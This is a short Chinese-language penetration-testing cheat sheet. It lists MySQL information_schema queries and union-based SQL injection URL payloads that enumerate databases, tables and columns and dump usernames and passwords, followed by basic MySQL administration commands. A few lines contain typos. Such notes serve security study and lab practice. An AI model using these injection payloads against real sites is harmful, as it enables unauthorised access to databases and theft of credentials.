渗透中常用命令
查看数据库版本
select @@version;
切换数据库到information_schema
use information_schema;
查看有哪些数据库
show tables; 注意SCHEMATA表,这张表里有mysql所有的数据库名称
查看指定数据库有哪些表
select table_name form information_schema.tables where table_schema="demotest";
看指定数据库的指定表字段
select column_name from information_schema.columns where table_name="user" and table_schema="demotest";
显示数据库名:database()
聚合显示表 group_concat(table_name)
聚合显示字段 group_concat(column_name)
聚合数值concat_ws('column_name1','conlumn_name2')
常见用法:
?id=1 and 1=2 union select 1,2,database()--+
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+ \\显示第一行数据
Mysql常用命令
查看有什么数据库
show databases;
创建数据库:
create database demodb;
删除数据库:
drop database demodb;
切换到某数据库
use demotest; 使用demotest数据库(需要已经创建好demotest数据库)
创建数据表
create table user (name varchar(25) , uid int(25));
删除数据表
drop table user;
显示有哪些表
show tables;
在数据表中插入数值
insert user value("zs" , "10");
insert user value("ls" , "20");
查看表中所有数据
select * from user;
查看表中指定数据
select uid from user where name="zs" ;
更新表中数值
update user set uid="30" where name="zs";
删除表中行数据
delete from user where name="ls";